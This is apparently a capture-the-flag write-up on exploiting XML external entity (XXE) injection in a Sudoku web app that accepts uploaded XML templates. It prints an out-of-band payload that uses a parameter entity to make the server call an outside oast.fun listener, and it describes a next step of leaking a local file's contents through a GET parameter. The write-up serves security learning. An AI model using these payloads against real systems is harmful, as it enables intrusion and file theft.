Thanks for taking the time to read this write-up.

• HackTheBox Academy has a module within the Penetration Tester Job Role Pathway that addresses XXE. I had a good understanding of what needed to be done, but this challenge really helped me refine my understanding. Good challenge here!

They gave us a Sudoku board that allows us to upload custom XML templates.

The XML template looks like this:

The web application requires that each row contain a single integer between 0 and 9, and the template must be a valid Sudoku answer key.

The first column in the template has the number 5. Therefore, we can test for classic XXE using a general entity like this:

The game accepts the upload as a valid Sudoku solution, so we know that XXE is the way to go.

The template is super restrictive. After some testing, it became painfully apparent that the only value that could be appended to that first column was 5. (It’s a Sudoku answer key.)

Next Step: Out of Band Testing. (OOB)

• I set up an interactsh.com server.
• I tested to see if I could get the web application to call out to my listener.
• Because reflection isn’t possible, we have to stick with parameter entities, which are defined and prefaced with the % symbol.
• The file on the left was uploaded, and the request was seen on my listener.

XML from the image above:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test123 [
  <!ENTITY % xxe SYSTEM "<https://gojvoiqamwyerrovnllfckaflb7rqheas.oast.fun>">
%xxe;
]>

The next step was to attempt to extract some data by creating a second parameter entity containing the contents of a local file and appending its contents as a GET parameter.